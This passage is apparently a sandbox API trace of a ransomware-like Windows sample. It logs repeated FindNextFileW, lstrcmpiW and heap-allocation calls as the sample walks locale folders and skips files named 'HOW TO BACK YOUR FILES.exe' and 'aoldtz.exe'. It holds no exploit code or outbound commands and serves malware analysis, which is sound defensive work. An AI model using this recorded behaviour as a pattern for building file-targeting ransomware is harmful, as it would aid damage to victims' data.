ListHead=0x2e7710, ListEntry=0x2e7c50) returned 0x2e7c70 [0101.595] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85dfaef0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8b9960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8b9960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bg", cAlternateFileName="")) returned 1 [0101.595] lstrcmpiW (lpString1="bg", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.595] lstrcmpiW (lpString1="bg", lpString2="aoldtz.exe") returned 1 [0101.595] lstrcpyW (in: lpString1=0x2cce510, lpString2="bg" | out: lpString1="bg") returned="bg" [0101.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c08 [0101.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0bb0 [0101.595] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c10 | out: ListHead=0x2e7710, ListEntry=0x2e7c10) returned 0x2e7c50 [0101.595] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85dfaef0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8b9960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8b9960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bn", cAlternateFileName="")) returned 1 [0101.595] lstrcmpiW (lpString1="bn", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.595] lstrcmpiW (lpString1="bn", lpString2="aoldtz.exe") returned 1 [0101.596] lstrcpyW (in: lpString1=0x2cce510, lpString2="bn" | out: lpString1="bn") returned="bn" [0101.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b28 [0101.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0cd8 [0101.596] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b30 | out: ListHead=0x2e7710, ListEntry=0x2e7b30) returned 0x2e7c10 [0101.596] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85dfaef0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8b9960, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8b9960, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ca", cAlternateFileName="")) returned 1 [0101.596] lstrcmpiW (lpString1="ca", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.596] lstrcmpiW (lpString1="ca", lpString2="aoldtz.exe") returned 1 [0101.596] lstrcpyW (in: lpString1=0x2cce510, lpString2="ca" | out: lpString1="ca") returned="ca" [0101.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7be8 [0101.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0e00 [0101.596] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bf0 | out: ListHead=0x2e7710, ListEntry=0x2e7bf0) returned 0x2e7b30 [0101.596] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e23760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e893800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e893800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cs", cAlternateFileName="")) returned 1 [0101.596] lstrcmpiW (lpString1="cs", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.596] lstrcmpiW (lpString1="cs", lpString2="aoldtz.exe") returned 1 [0101.596] lstrcpyW (in: lpString1=0x2cce510, lpString2="cs" | out: lpString1="cs") returned="cs" [0101.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2240 [0101.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e0f28 [0101.596] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2248 | out: ListHead=0x2e7710, ListEntry=0x2d2248) returned 0x2e7bf0 [0101.596] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e23760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e893800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e893800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="da", cAlternateFileName="")) returned 1 [0101.596] lstrcmpiW (lpString1="da", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.596] lstrcmpiW (lpString1="da", lpString2="aoldtz.exe") returned 1 [0101.596] lstrcpyW (in: lpString1=0x2cce510, lpString2="da" | out: lpString1="da") returned="da" [0101.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2580 [0101.597] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1050 [0101.597] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2588 | out: ListHead=0x2e7710, ListEntry=0x2d2588) returned 0x2d2248 [0101.597] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e23760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e893800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e893800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="de", cAlternateFileName="")) returned 1 [0101.597] lstrcmpiW (lpString1="de", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.597] lstrcmpiW (lpString1="de", lpString2="aoldtz.exe") returned 1 [0101.597] lstrcpyW (in: lpString1=0x2cce510, lpString2="de" | out: lpString1="de") returned="de" [0101.597] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2560 [0101.597] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1178 [0101.597] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2568 | out: ListHead=0x2e7710, ListEntry=0x2d2568) returned 0x2d2588 [0101.597] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e23760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e893800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e893800, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="el", cAlternateFileName="")) returned 1 [0101.597] lstrcmpiW (lpString1="el", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.597] lstrcmpiW (lpString1="el", lpString2="aoldtz.exe") returned 1 [0101.597] lstrcpyW (in: lpString1=0x2cce510, lpString2="el" | out: lpString1="el") returned="el" [0101.597] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d25e0 [0101.597] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e12a0 [0101.597] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d25e8 | out: ListHead=0x2e7710, ListEntry=0x2d25e8) returned 0x2d2568 [0101.597] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e23760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e86d6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e86d6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en_GB", cAlternateFileName="")) returned 1 [0101.597] lstrcmpiW (lpString1="en_GB", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.597] lstrcmpiW (lpString1="en_GB", lpString2="aoldtz.exe") returned 1 [0101.597] lstrcpyW (in: lpString1=0x2cce510, lpString2="en_GB" | out: lpString1="en_GB") returned="en_GB" [0101.597] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2600 [0101.597] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11c) returned 0x2e13c8 [0101.597] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2608 | out: ListHead=0x2e7710, ListEntry=0x2d2608) returned 0x2d25e8 [0101.597] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e23760, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e86d6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e86d6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en_US", cAlternateFileName="")) returned 1 [0101.597] lstrcmpiW (lpString1="en_US", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.598] lstrcmpiW (lpString1="en_US", lpString2="aoldtz.exe") returned 1 [0101.598] lstrcpyW (in: lpString1=0x2cce510, lpString2="en_US" | out: lpString1="en_US") returned="en_US" [0101.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2360 [0101.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11c) returned 0x2e14f0 [0101.598] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2368 | out: ListHead=0x2e7710, ListEntry=0x2d2368) returned 0x2d2608 [0101.598] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e498c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e86d6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e86d6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es", cAlternateFileName="")) returned 1 [0101.598] lstrcmpiW (lpString1="es", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.598] lstrcmpiW (lpString1="es", lpString2="aoldtz.exe") returned 1 [0101.598] lstrcpyW (in: lpString1=0x2cce510, lpString2="es" | out: lpString1="es") returned="es" [0101.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2380 [0101.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1618 [0101.598] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2388 | out: ListHead=0x2e7710, ListEntry=0x2d2388) returned 0x2d2368 [0101.598] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e498c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e86d6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e86d6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="es_419", cAlternateFileName="")) returned 1 [0101.598] lstrcmpiW (lpString1="es_419", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.598] lstrcmpiW (lpString1="es_419", lpString2="aoldtz.exe") returned 1 [0101.598] lstrcpyW (in: lpString1=0x2cce510, lpString2="es_419" | out: lpString1="es_419") returned="es_419" [0101.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23c0 [0101.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11e) returned 0x2e1740 [0101.598] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23c8 | out: ListHead=0x2e7710, ListEntry=0x2d23c8) returned 0x2d2388 [0101.598] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e498c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e86d6a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e86d6a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="et", cAlternateFileName="")) returned 1 [0101.598] lstrcmpiW (lpString1="et", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.598] lstrcmpiW (lpString1="et", lpString2="aoldtz.exe") returned 1 [0101.599] lstrcpyW (in: lpString1=0x2cce510, lpString2="et" | out: lpString1="et") returned="et" [0101.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d25a0 [0101.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1868 [0101.599] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d25a8 | out: ListHead=0x2e7710, ListEntry=0x2d25a8) returned 0x2d23c8 [0101.599] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e498c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e847540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e847540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eu", cAlternateFileName="")) returned 1 [0101.599] lstrcmpiW (lpString1="eu", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.599] lstrcmpiW (lpString1="eu", lpString2="aoldtz.exe") returned 1 [0101.599] lstrcpyW (in: lpString1=0x2cce510, lpString2="eu" | out: lpString1="eu") returned="eu" [0101.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2280 [0101.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1990 [0101.599] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2288 | out: ListHead=0x2e7710, ListEntry=0x2d2288) returned 0x2d25a8 [0101.599] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e498c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e847540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e847540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fa", cAlternateFileName="")) returned 1 [0101.599] lstrcmpiW (lpString1="fa", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.599] lstrcmpiW (lpString1="fa", lpString2="aoldtz.exe") returned 1 [0101.599] lstrcpyW (in: lpString1=0x2cce510, lpString2="fa" | out: lpString1="fa") returned="fa" [0101.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2620 [0101.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1ab8 [0101.599] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2628 | out: ListHead=0x2e7710, ListEntry=0x2d2628) returned 0x2d2288 [0101.599] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e498c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e847540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e847540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fi", cAlternateFileName="")) returned 1 [0101.599] lstrcmpiW (lpString1="fi", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.599] lstrcmpiW (lpString1="fi", lpString2="aoldtz.exe") returned 1 [0101.599] lstrcpyW (in: lpString1=0x2cce510, lpString2="fi" | out: lpString1="fi") returned="fi" [0101.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23a0 [0101.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1be0 [0101.599] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23a8 | out: ListHead=0x2e7710, ListEntry=0x2d23a8) returned 0x2d2628 [0101.599] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e6fa20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e847540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e847540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fil", cAlternateFileName="")) returned 1 [0101.600] lstrcmpiW (lpString1="fil", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.600] lstrcmpiW (lpString1="fil", lpString2="aoldtz.exe") returned 1 [0101.600] lstrcpyW (in: lpString1=0x2cce510, lpString2="fil" | out: lpString1="fil") returned="fil" [0101.600] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2260 [0101.600] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x118) returned 0x2e1d08 [0101.600] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2268 | out: ListHead=0x2e7710, ListEntry=0x2d2268) returned 0x2d23a8 [0101.600] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e6fa20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8213e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8213e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr", cAlternateFileName="")) returned 1 [0101.600] lstrcmpiW (lpString1="fr", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.600] lstrcmpiW (lpString1="fr", lpString2="aoldtz.exe") returned 1 [0101.600] lstrcpyW (in: lpString1=0x2cce510, lpString2="fr" | out: lpString1="fr") returned="fr" [0101.600] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d23e0 [0101.600] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e1e30 [0101.600] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d23e8 | out: ListHead=0x2e7710, ListEntry=0x2d23e8) returned 0x2d2268 [0101.600] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e6fa20, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8213e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8213e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fr_CA", cAlternateFileName="")) returned 1 [0101.600] lstrcmpiW (lpString1="fr_CA", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.600] lstrcmpiW (lpString1="fr_CA", lpString2="aoldtz.exe") returned 1 [0101.600] lstrcpyW (in: lpString1=0x2cce510, lpString2="fr_CA" | out: lpString1="fr_CA") returned="fr_CA" [0101.600] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2400 [0101.600] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x11c) returned 0x2e1f58 [0101.600] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2408 | out: ListHead=0x2e7710, ListEntry=0x2d2408) returned 0x2d23e8 [0101.600] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e95b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8213e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8213e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gl", cAlternateFileName="")) returned 1 [0101.600] lstrcmpiW (lpString1="gl", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.600] lstrcmpiW (lpString1="gl", lpString2="aoldtz.exe") returned 1 [0101.601] lstrcpyW (in: lpString1=0x2cce510, lpString2="gl" | out: lpString1="gl") returned="gl" [0101.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2420 [0101.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e2080 [0101.601] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2428 | out: ListHead=0x2e7710, ListEntry=0x2d2428) returned 0x2d2408 [0101.601] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e95b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e8213e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e8213e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gu", cAlternateFileName="")) returned 1 [0101.601] lstrcmpiW (lpString1="gu", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.601] lstrcmpiW (lpString1="gu", lpString2="aoldtz.exe") returned 1 [0101.601] lstrcpyW (in: lpString1=0x2cce510, lpString2="gu" | out: lpString1="gu") returned="gu" [0101.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2440 [0101.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e21a8 [0101.601] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2448 | out: ListHead=0x2e7710, ListEntry=0x2d2448) returned 0x2d2428 [0101.601] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e95b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7fb280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7fb280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hi", cAlternateFileName="")) returned 1 [0101.601] lstrcmpiW (lpString1="hi", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0101.601] lstrcmpiW (lpString1="hi", lpString2="aoldtz.exe") returned 1 [0101.601] lstrcpyW (in: lpString1=0x2cce510, lpString2="hi" | out: lpString1="hi") returned="hi" [0101.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2520 [0101.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x116) returned 0x2e22d0 [0101.601] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2528 | out: ListHead=0x2e7710, ListEntry=0x2d2528) returned 0x2d2448 [0101.601] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e60c0a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4e60c0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0101.601] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0101.601] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85e95b80, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4e7fb280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4e7fb280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hr", cAlternateFileName="")) returned 1 [0101.601] lstrcmpiW (lpString1="hr", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0101.601] lstrcmpiW (lpString1="hr", lpString2="aoldtz.exe") returned 1 [0101.601] lstrcpyW (in: lpString1=0x2cce510, lpString2="hr" | out: lpString1="hr") 